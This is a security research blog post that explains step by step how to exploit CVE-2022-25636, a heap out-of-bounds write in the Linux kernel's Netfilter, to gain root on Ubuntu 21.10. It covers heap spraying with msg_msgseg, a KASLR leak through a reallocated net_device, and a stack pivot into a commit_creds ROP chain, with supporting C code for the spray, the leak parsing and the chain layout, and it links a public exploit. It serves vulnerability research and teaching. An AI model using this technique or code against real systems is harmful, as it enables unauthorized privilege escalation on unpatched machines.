[ kernel ]

CVE-2022-25636

In this post I cover the exploitation details for CVE-2022-25636, a bug in the Linux kernel's Netfilter component discovered by @kallsyms.
His blog already does a great job of explaining how he discovered the vulnerability, so here I will focus only on the exploitation phase.

Introduction

The bug is a heap out-of-bounds write in the function nft_fwd_dup_netdev_offload(), located in nf_dup_netdev.c.
The bug was introduced in version 5.4.

The bug

Let’s take a look at the vulnerable function:

int nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx,
			       struct nft_flow_rule *flow,
			       enum flow_action_id id, int oif)
{
	struct flow_action_entry *entry;
	struct net_device *dev;

	/* nft_flow_rule_destroy() releases the reference on this device. */
	dev = dev_get_by_index(ctx->net, oif);
	if (!dev)
		return -EOPNOTSUPP;

	entry = &flow->rule->action.entries[ctx->num_actions++];
	entry->id = id;
	entry->dev = dev;

	return 0;
}

Each time nft_fwd_dup_netdev_offload() is called, ctx->num_actions is incremented regardless of how many entries were allocated for rule->action.entries, so the write below can land out of bounds:

entry = &flow->rule->action.entries[ctx->num_actions++];
entry->id = id;
entry->dev = dev;

id is of type enum flow_action_id and in our case id = FLOW_ACTION_MIRRED = 5.
dev is a pointer to the targeted net_device struct.
net_device is the struct used to describe network devices (such as “lo”, “eth0”, etc.). It resides in the kmalloc-4096 slab, and we will describe it later.

Exploitation

The vulnerability doesn’t give us a lot of control over the heap, but luckily it’s enough to give us a root shell :).
We will be targeting Ubuntu 21.10 using kernel version 5.13.0-30.
Let’s go step by step through the possible ideas for exploitation.

Leaking the heap
Leaking function pointers
RIP control

1. Leaking the heap

As we said before one of the values that is being written out of bounds is a pointer to a net_device struct, which resides on the heap.
If we manage to allocate, right after the rule struct, a buffer whose content is later returned to userland, we can make the dev pointer land in that buffer and then leak it.
One example of such a buffer is the msg_msg struct.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------
0x00 |     list head *next   |    list head *prev      |  <- msg_msg
0x10 |          m_type       |        m_ts             |
0x20 |          *next        |        *security        |
0x30 |                       |                         |  <--|
0x40 |                       |                         |     |
0x50 |                       |                         |     | user data
0x60 |                       |                         |     |
0x70 |                       |                         |  <--|
     ---------------------------------------------------

By changing the number of accounted “dup” expressions we can choose the rule struct size i.e. the destination kmalloc slab.
This is the rule struct:

/* offset      |    size */  struct flow_rule {
/*      0      |      24 */    struct flow_match {
/*      0      |       8 */        struct flow_dissector *dissector;
/*      8      |       8 */        void *mask;
/*     16      |       8 */        void *key;
                               } match;
/*     24      |       8 */    struct flow_action {
/*     24      |       4 */        unsigned int num_entries;
/* XXX  4-byte hole      */
/*     32      |       0 */        struct flow_action_entry entries[];
                               } action;
                             }

For example, if we set only one “dup” expression, the rule buffer will be of size:
sizeof(struct flow_match) + sizeof(struct flow_action) + 1 * sizeof(struct flow_action_entry) =
sizeof(struct flow_match) + sizeof(unsigned int) + 4 (padding hole) + 1 * sizeof(struct flow_action_entry) =
24 + 4 + 4 + 1 * 80 = 112 -> kmalloc-128
So we can choose the kmalloc slab by increasing the number of accounted dups:

32 + 1*80 = 112 -> kmalloc-128
32 + 2*80 = 192 -> kmalloc-192
32 + 3*80 = 272 -> kmalloc-512
...
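The size arithmetic can be sketched as a small helper. This is only an illustration: the two constants come from the struct dump above (entries at offset 32, 80 bytes per entry), and the bucket table is the usual list of general-purpose kmalloc caches, which I am assuming matches the target kernel. The function names are made up for this post.

```c
#include <stddef.h>

/* Assumed from the struct dump above, not read from kernel headers. */
#define FLOW_RULE_HDR_SIZE   32 /* offset of action.entries, hole included */
#define FLOW_ACTION_ENTRY_SZ 80 /* sizeof(struct flow_action_entry) */

/* Bytes requested for a rule with n accounted actions. */
size_t rule_alloc_size(size_t n_accounted)
{
	return FLOW_RULE_HDR_SIZE + n_accounted * FLOW_ACTION_ENTRY_SZ;
}

/* Smallest general-purpose kmalloc cache that fits size (0 if none). */
size_t kmalloc_bucket(size_t size)
{
	static const size_t buckets[] = { 8, 16, 32, 64, 96, 128, 192, 256,
					  512, 1024, 2048, 4096, 8192 };
	size_t i;

	for (i = 0; i < sizeof(buckets) / sizeof(buckets[0]); i++)
		if (size <= buckets[i])
			return buckets[i];
	return 0;
}
```

For instance, kmalloc_bucket(rule_alloc_size(2)) gives 192, so two accounted dups fill a kmalloc-192 object exactly.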

`msg_msg` alternatives

The struct msg_msg is usually the way to go when spraying the heap. However the struct has a 0x30 bytes long header before the actual buffer:

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

// sizeof(struct msg_msg) = 0x30

Our leak relies on a heap OOB write, and we want to corrupt as few structures on the heap as possible.
Suppose that we set 1 accounted dup (so we are in kmalloc-128). If our heap spray was successful (a msg_msg sits directly after the rule struct), then the msg_msg header isn’t really a problem.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          |  <- msg_msg
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |  <--|
0x40 |         | id (oob 2)  |                         |     |
0x50 |                       |   *dev (oob 2)          |     | user data
0x60 |                       |                         |     |
0x70 |                       |                         |  <--|
     ---------------------------------------------------

To make the net_device pointer land in our buffer we would need to trigger 2 oob dups. The only corrupted header field would be the prev pointer of msg_msg.m_list, which is not a problem. The problem is that if our spray didn’t succeed and the chunk after the rule is not our msg_msg, we could be overwriting important data and make the kernel panic.
My solution to make this leak as safe as possible was to use msg_msgseg instead of msg_msg.

Brief Linux IPC recap

When we call msgsnd() with a size > DATALEN_MSG (4096 - sizeof(msg_msg) bytes), our message is split on the heap: msg_msg.next points to a msg_msgseg struct that holds the rest of the data.

struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

// sizeof(struct msg_msgseg) = 0x8

Look at that! We only have an 8-byte header now.
So if we call msgsnd() with size = (4096 - 0x30) + (128 - 0x8), we get a msg_msg in kmalloc-4096 and a msg_msgseg in kmalloc-128.
Perfect! We can use this strategy to spray kmalloc-128 using msg_msgseg.
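Here is a minimal sketch of what one spray message could look like. The header sizes are the ones given above; the struct and function names (spray_msg, seg_spray_len, seg_spray_one) are hypothetical and are not taken from the exploit code. It assumes a 4096-byte page and a queue already created with msgget().

```c
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define PAGE_SZ        4096
#define MSG_MSG_HDR    0x30 /* sizeof(struct msg_msg), from the text */
#define MSG_MSGSEG_HDR 0x8  /* sizeof(struct msg_msgseg), from the text */

/* Userland view of a message: type followed by the payload. */
struct spray_msg {
	long mtype;
	char mtext[];
};

/* Payload length that puts the tail segment in kmalloc-<slab>. */
size_t seg_spray_len(size_t slab)
{
	return (PAGE_SZ - MSG_MSG_HDR) + (slab - MSG_MSGSEG_HDR);
}

/* Queue one message on qid; returns 0 on success, -1 on error. */
int seg_spray_one(int qid, size_t slab, long mtype, unsigned char fill)
{
	size_t len = seg_spray_len(slab);
	struct spray_msg *m = malloc(sizeof(*m) + len);
	int ret;

	if (!m)
		return -1;
	m->mtype = mtype;
	memset(m->mtext, fill, len);
	/* IPC_NOWAIT: fail instead of blocking if the queue is full. */
	ret = msgsnd(qid, m, len, IPC_NOWAIT);
	free(m);
	return ret;
}
```

With slab = 128 the payload is 4168 bytes, which fits under the usual 8192-byte msgmax limit. A real spray would call seg_spray_one() in a loop over several queues.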

Back to our example. Now we only need 1 oob dup instead of 2:

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |         *next         |   *dev (oob 1)          |  <- msg_msgseg
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------

This way we only need 1 oob write, so if our heap spray failed we corrupt at most 8 bytes of the adjacent chunk. This lets us retry the spray with a lower probability of crashing the kernel.

2. Leaking function pointers

Now that we have a stable heap leak we need to leak the base virtual address of the kernel .text.
The struct net_device contains many pointers to _ops structures (which are just structs containing function pointers), so if we find a way to leak its content we could defeat KASLR.

2.1 Overwriting net_device struct

A good starting point for defeating KASLR is to free the net_device struct and cause a UAF.
One way to free the net_device struct is to overwrite the msg_msg.security pointer with the net_device ptr during our OOB writes. Then, when the msg_msg is freed, msg_msg.security is freed too.

// msgrcv() -> free_msg() -> security_msg_msg_free()

void security_msg_msg_free(struct msg_msg *msg) {
	...
	kfree(msg->security);
	...
}

Here is where the exploit starts losing stability.
Let’s try to overwrite the security pointer using the kmalloc-128 slab.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          |  <- msg_msg
0x10 |                       |                         |
0x20 |                       |        *security        |  <- msg_msg.security
0x30 |                       |                         |  <--|
0x40 |         | id (oob 2)  |                         |     |
0x50 |                       |   *dev (oob 2)          |     | user data
0x60 |                       |                         |     |
0x70 |                       |                         |  <--|
     ---------------------------------------------------

Oops, because of alignment the oob writes skip right over the security ptr. However, if we use 1 more oob write:

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          |  <- msg_msg 1
0x10 |                       |                         |
0x20 |                       |                         |  <- msg_msg.security
0x30 |                       |                         |
0x40 |         | id (oob 2)  |                         |
0x50 |                       |   *dev (oob 2)          |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 2
0x10 |         | id (oob 3)  |                         |
0x20 |                       |   *dev (oob 3)          |  <- msg_msg.security
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------

Yes! We overwrote the msg_msg.security ptr! The problem here is that if our heap spray doesn’t succeed we could corrupt two different heap allocations.
The biggest problem is when there is a free chunk directly after our rule struct. In that case the id field of the second oob write would overwrite the freelist pointer, which would make the kernel panic very soon.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          | <- free chunk
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |         | id (oob 2)  |  <----------------------- freelist pointer
0x50 |                       |   *dev (oob 2)          |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 1
0x10 |         | id (oob 3)  |                         |
0x20 |                       |   *dev (oob 3)          |  <- msg_msg.security
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------

The idea is to switch the kmalloc slab used by the rule struct. Let’s increase the number of accounted dups from 1 to 2 (the rule struct is now in kmalloc-192) and the number of unaccounted dups to 6.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |        |id (acc dup 1)|                         |
0x30 |                       |   *dev (acc dup 1)      |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |        |id (acc dup 2)|                         |
0x80 |                       |   *dev (acc dup 2)      |
0x90 |                       |                         |
0xa0 |                       |                         |
0xb0 |                       |                         |
     ---------------------------------------------------
0x00 |        | id (oob 1)   |                         |  <- msg_msg 1
0x10 |                       |   *dev (oob 1)          |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |        | id (oob 2)   |                         |
0x60 |                       |   *dev (oob 2)          |
0x70 |                       |                         |
0x80 |                       |                         |
0x90 |                       |                         |
0xa0 |        | id (oob 3)   |                         |
0xb0 |                       |   *dev (oob 3)          |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 2
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |        | id (oob 4)   |                         |
0x40 |                       |   *dev (oob 4)          |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
0x80 |        | id (oob 5)   |                         |
0x90 |                       |   *dev (oob 5)          |
0xa0 |                       |                         |
0xb0 |                       |                         |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 3
0x10 |        | id (oob 6)   |                         |
0x20 |                       |   *dev (oob 6)          |  <- msg_msg.security
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
0x80 |                       |                         |
0x90 |                       |                         |
0xa0 |                       |                         |
0xb0 |                       |                         |
     ---------------------------------------------------

Here if our heap spray doesn’t succeed then we could theoretically overwrite 3 different heap structures and maybe cause a kernel panic.
However there isn’t the danger of overwriting the freelist ptr.
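The diagrams above can be reproduced with a bit of arithmetic. The sketch below is a userland model, not kernel code: it assumes the chunks are contiguous in the slab, takes the entry size and the entries offset from the struct dump, and uses 24 as the offset of dev inside an entry, which I inferred from the diagrams (id at 0x20, dev at 0x38). All names are illustrative.

```c
#include <stddef.h>

#define ENTRIES_OFF 32 /* offset of action.entries in the rule, from the dump */
#define ENTRY_SZ    80 /* sizeof(struct flow_action_entry) */
#define DEV_OFF     24 /* offset of .dev in an entry, inferred from the diagrams */

struct landing {
	size_t chunk;  /* 0 = the rule's own chunk, 1 = the next one, ... */
	size_t offset; /* byte offset inside that chunk */
};

/* Where a byte at rule_off from the start of the rule ends up. */
static struct landing locate(size_t rule_off, size_t slab)
{
	struct landing l = { rule_off / slab, rule_off % slab };
	return l;
}

/* Landing spot of entry->id for the k-th oob dup (k starts at 1). */
struct landing oob_id(size_t accounted, size_t k, size_t slab)
{
	return locate(ENTRIES_OFF + (accounted + k - 1) * ENTRY_SZ, slab);
}

/* Landing spot of entry->dev for the k-th oob dup (k starts at 1). */
struct landing oob_dev(size_t accounted, size_t k, size_t slab)
{
	return locate(ENTRIES_OFF + (accounted + k - 1) * ENTRY_SZ + DEV_OFF, slab);
}
```

For example, oob_dev(2, 6, 192) gives chunk 3, offset 0x28, which is msg_msg.security, while oob_id(1, 2, 128) gives chunk 1, offset 0x40, the freelist pointer hit shown in the kmalloc-128 diagram.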

One bonus is that when we overwrite the security field of the msg_msg, the same oob write also overwrites the lower 4 bytes of msg_msg.m_type with id.
If during msgsnd() we set msg_msg.m_type to 0x4141414141414141, then when freeing the msg_msg structs with msgrcv() we can check whether one of the m_type values is 0x4141414100000005.
If that happens then we know we successfully overwrote the security field.
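A tiny sketch of that check, assuming the marker and the id value given above. The function name is hypothetical; the mtype argument is the type reported by msgrcv() for the received message.

```c
#include <stdint.h>

#define MTYPE_MARKER 0x4141414141414141ULL /* m_type set during msgsnd() */
#define OOB_ID_VALUE 5ULL                  /* FLOW_ACTION_MIRRED, per the text */

/* Returns 1 if the low 32 bits of the marker were replaced by the oob id. */
int mtype_was_clobbered(uint64_t mtype)
{
	uint64_t expected = (MTYPE_MARKER & 0xffffffff00000000ULL) | OOB_ID_VALUE;

	return mtype == expected;
}
```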

Reallocating the net_device struct

Once we have freed the net_device struct we can spray the kmalloc-4096 slab to overwrite it.
Most operations on the net_device struct access data stored at the top of the struct (i.e. in the first 0x30 bytes of the allocation), such as net_device.name, which is the first field.
For that reason we need to control the whole reallocated chunk, so we can’t use a msg_msg spray, whose header would occupy those first 0x30 bytes. We need another spraying technique: the setxattr spray.
Usually the setxattr spray is done together with userfaultfd; however, the unprivileged_userfaultfd sysctl knob doesn’t allow unprivileged users to use it.
As an alternative I used the FUSE technique, which lets us halt the kernel on a copy_to/from_user exactly like userfaultfd. To learn more about the FUSE technique I recommend reading this writeup for CVE-2022-0185.

kmalloc-4096 spray

And what if our kmalloc-4096 spray doesn’t overwrite the net_device struct?
The net_device struct has a field int ifindex. This field can be retrieved by the SIOCGIFINDEX ioctl, which takes the name of the net_device, in our case “lo”.
We can call this ioctl using the if_nametoindex(char *ifname) function.
For example if “lo” has ifindex = 1 then if_nametoindex("lo") returns 1.
When we overwrite the net_device struct we can set the ifindex to a recognizable value (e.g. 0x41414141), so that during the exploit we can check whether if_nametoindex("lo") returns 0x41414141. If it does, we are sure that the net_device was overwritten.
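In code the check is a one-liner. This is a sketch with a made-up function name; the marker is the example value from the text.

```c
#include <net/if.h>

#define IFINDEX_MARKER 0x41414141u /* value written into the fake net_device */

/* Returns 1 if "lo" now reports the marker as its interface index. */
int lo_was_overwritten(void)
{
	/* if_nametoindex() returns 0 on error, which never equals the marker. */
	return if_nametoindex("lo") == IFINDEX_MARKER;
}
```

On an untouched system this returns 0, so it can be polled after each spray round.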

2.2 Obtaining arbitrary read

The struct net_device has a field unsigned char *dev_addr.
This field normally points to the MAC address of the net_device, and its length is specified by the unsigned char addr_len field.
One way to read from dev_addr is through the SIOCGIFHWADDR ioctl. Here is an example:

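/* needs <net/if.h>, <netinet/in.h>, <sys/ioctl.h>, <sys/socket.h>,
   plus <stdio.h>, <stdlib.h> and <string.h> */
struct ifreq *ifr = calloc(1, 0x1000);
strcpy(ifr->ifr_name, "lo");

int fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if (fd < 0) {	/* socket() returns -1 on failure, not 0 */
	perror("socket()");
	exit(1);
}

if (ioctl(fd, SIOCGIFHWADDR, ifr) != 0) {
	perror("ioctl(SIOCGIFHWADDR)");
	exit(1);
}
/* on success, ifr->ifr_hwaddr.sa_data holds the bytes copied from dev->dev_addr */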

This is the ioctl handler:

int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
	      void __user *data, bool *need_copyout)
{
	...
	switch (cmd) {
	case SIOCGIFHWADDR:
		dev_load(net, ifr->ifr_name);
		ret = dev_get_mac_address(&ifr->ifr_hwaddr, net, ifr->ifr_name);

		...

		return ret;
	...
	}
}

dev_get_mac_address:

int dev_get_mac_address(struct sockaddr *sa, struct net *net, char *dev_name)
{
	...
	struct net_device *dev;
	...

	dev = dev_get_by_name_rcu(net, dev_name);
	
	...

	if (!dev->addr_len)
		memset(sa->sa_data, 0, size);
	else
		memcpy(sa->sa_data, dev->dev_addr, min_t(size_t, size, dev->addr_len)); // <--- arb read

	...
}

Perfect! After reallocating our net_device we can set the dev_addr pointer to somewhere in the heap and leak data.
But what do we leak? After reallocating the net_device all of the useful _ops pointers are gone (both because of init_on_alloc and because we overwrote them with our data).
An interesting fact is that when unsharing into a network namespace, a new net_device for “lo” is allocated. The idea is the following:

clone() a child using CLONE_NEWNET and leak its net_device ptr as we did before.
In the parent process leak the net_device (the two net_device leaks are different!!).
Now we can free the parent’s net_device, reallocate it, and overwrite the dev_addr ptr with the address of the child’s net_device (which remains untouched and thus still contains many _ops pointers!).
Call ioctl(SIOCGIFHWADDR) in the parent process and boom we leaked KASLR :)
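Turning the bytes returned by the ioctl into a KASLR base could look like the sketch below. It assumes the fake net_device sets addr_len to at least 8, so that a full pointer is copied into sa_data. The ops_offset parameter (the offset of loopback_ops inside the kernel image) depends on the kernel build and is not given here. Function names are hypothetical.

```c
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* Read the first 8 bytes of sa_data as a little-endian kernel pointer. */
uint64_t leaked_qword(const struct sockaddr *hwaddr)
{
	uint64_t v;

	/* sa_data is 14 bytes long, so an 8-byte pointer fits. */
	memcpy(&v, hwaddr->sa_data, sizeof(v));
	return v;
}

/* Kernel base = leaked loopback_ops address minus its offset in the image. */
uint64_t kernel_base(uint64_t leaked_ops, uint64_t ops_offset)
{
	return leaked_ops - ops_offset;
}
```

After a successful SIOCGIFHWADDR call one would pass &ifr->ifr_hwaddr to leaked_qword().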

The leak I chose is net_device.netdev_ops, which in our case points to loopback_ops.

3. RIP control

Now we have both a heap and a .text leak :). We are very close.
As we said before, the net_device contains many _ops pointers, so when reallocating the net_device struct we can point one of the _ops pointers somewhere inside our heap allocation, set one of its function pointers and execute arbitrary functions.
Obviously SMEP is enabled, so we can’t just jump back to userland.
The idea is to perform stack pivoting: we control the heap allocation, so we can store our pivoted stack on the kernel heap and thus bypass SMAP as well.
Luckily the kernel is full of useful gadgets to perform stack pivoting.
Most of the net_device function pointers are invoked with the first parameter set to the net_device ptr, so a gadget that pivots the stack to $rdi is perfect. This is the one I found:

push   rdi
add    BYTE PTR [rbx+0x41],bl
pop    rsp
pop    r13
pop    rbp
ret 

Perfect! Now we can simply put a commit_creds(prepare_kernel_cred(0)) ropchain at the top of the reallocated net_device and get root.
The function pointer I decided to overwrite is dev.ethtool_ops->begin.
To call the ->begin function we can use the SIOCETHTOOL ioctl:

int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
	      void __user *data, bool *need_copyout)
{
	...
	switch (cmd) {
	...
	case SIOCETHTOOL:
		dev_load(net, ifr->ifr_name);
		...
		ret = dev_ethtool(net, ifr);
		...
	...
	}
}

dev_ethtool:

int dev_ethtool(struct net *net, struct ifreq *ifr)
{
	struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
	...
	if (dev->ethtool_ops->begin) {
		rc = dev->ethtool_ops->begin(dev);
		if (rc  < 0)
			return rc;
	}
	...
}

This is what the reallocated net_device will look like:

      ---------------------------------------------------
0x000 |    dev.name = "lo"    |                         |  <- net_device
0x010 |                       |                         |  <--|
0x020 |                       |                         |     | Pivoted stack
0x030 |                       |                         |     |
0x040 |                       |                         |     |
0x050 |                       |                         |  <--|
0x060 |                       |                         |
0x070 |                       |                         |
...
0x420 |  dev.ethtool_ops ptr  |  ethtool_ops.begin      |  <- stack pivot gadget
...
      ---------------------------------------------------

The ropchain I used is the following:

// set $rdi = 0
pop rdi; ret;

prepare_kernel_cred();

// clear Zero Flag, so that the next jne doesn't jump
xor dh, dh; ret;

pop; pop; pop; ret;

// set $rdi to return value of prepare_kernel_cred()
mov rdi, rax; jne; ret;

commit_creds()

// return to userland
kpti_trampoline_pop_rax_pop_rdi_swapgs_iretq
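As a rough illustration, the chain can be laid out in a buffer like this. Every address is an input parameter, since the real values depend on the kernel build and on the leaked KASLR base. The struct and function names are made up for this sketch. Since the pivot gadget pops r13 and rbp before its ret, the buffer is meant to be copied at offset 0x10 of the fake net_device. Filling all three popped slots with ones is my assumption, and one of them is meant to overlap net_device.state.

```c
#include <stddef.h>
#include <stdint.h>

/* Gadget and function addresses: all inputs, no real values here. */
struct rop_addrs {
	uint64_t pop_rdi_ret;
	uint64_t prepare_kernel_cred;
	uint64_t xor_dh_dh_ret;
	uint64_t pop3_ret;
	uint64_t mov_rdi_rax_jne_ret;
	uint64_t commit_creds;
	uint64_t kpti_trampoline; /* pop rax; pop rdi; swapgs; iretq */
};

/* Saved userland context consumed by iretq. */
struct user_ctx {
	uint64_t rip, cs, rflags, rsp, ss;
};

/* Writes the chain into stack and returns the number of qwords used. */
size_t build_chain(uint64_t *stack, const struct rop_addrs *a,
		   const struct user_ctx *u)
{
	size_t i = 0;

	stack[i++] = a->pop_rdi_ret;
	stack[i++] = 0;                      /* rdi = 0 */
	stack[i++] = a->prepare_kernel_cred;
	stack[i++] = a->xor_dh_dh_ret;       /* step taken from the chain above */
	stack[i++] = a->pop3_ret;
	stack[i++] = ~0ULL;                  /* popped; one slot overlaps state */
	stack[i++] = ~0ULL;
	stack[i++] = ~0ULL;
	stack[i++] = a->mov_rdi_rax_jne_ret; /* rdi = new cred */
	stack[i++] = a->commit_creds;
	stack[i++] = a->kpti_trampoline;
	stack[i++] = 0;                      /* popped into rax */
	stack[i++] = 0;                      /* popped into rdi */
	stack[i++] = u->rip;
	stack[i++] = u->cs;
	stack[i++] = u->rflags;
	stack[i++] = u->rsp;
	stack[i++] = u->ss;
	return i;
}
```

The user_ctx values would be saved from userland before triggering the gadget, with rip pointing at the function that spawns the shell.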

The pop_pop_pop_ret gadget is there because in order to call dev.ethtool_ops->begin we must satisfy a check present in dev_ethtool.

int dev_ethtool(struct net *net, struct ifreq *ifr)
{
	struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
	...
	if (!dev || !netif_device_present(dev)) // <----- this
		return -ENODEV;
	...
	if (dev->ethtool_ops->begin) {
		rc = dev->ethtool_ops->begin(dev);
		if (rc  < 0)
			return rc;
	}
	...
}

static inline bool netif_device_present(const struct net_device *dev)
{
	return test_bit(__LINK_STATE_PRESENT, &dev->state);
}

net_device.state is a bitset, and the bit __LINK_STATE_PRESENT must be set to 1.
Unfortunately the unsigned long state field is at the top of the net_device struct, right in the middle of our pivoted stack.
We can just set net_device.state = 0xffffffffffffffff and use an extra pop that discards it into an unused register, then continue the ropchain.

Wrapping up

We create a child process with a new network namespace
In the child process we leak its net_device pointer
In the parent process we leak its net_device pointer
Free the parent’s net_device
Reallocate it and overwrite net_device.dev_addr with the address of the child’s net_device
Leak KASLR by reading net_device.dev_addr
Free the parent’s net_device again
Reallocate it and store a pivoted stack at the top of the heap allocation and overwrite a function pointer with a stack pivot gadget
Call the gadget, perform stack pivoting and get root :)

Poc

POC on Ubuntu 21.10

Exploit code

You can find my exploit on Github: https://github.com/Bonfee/CVE-2022-25636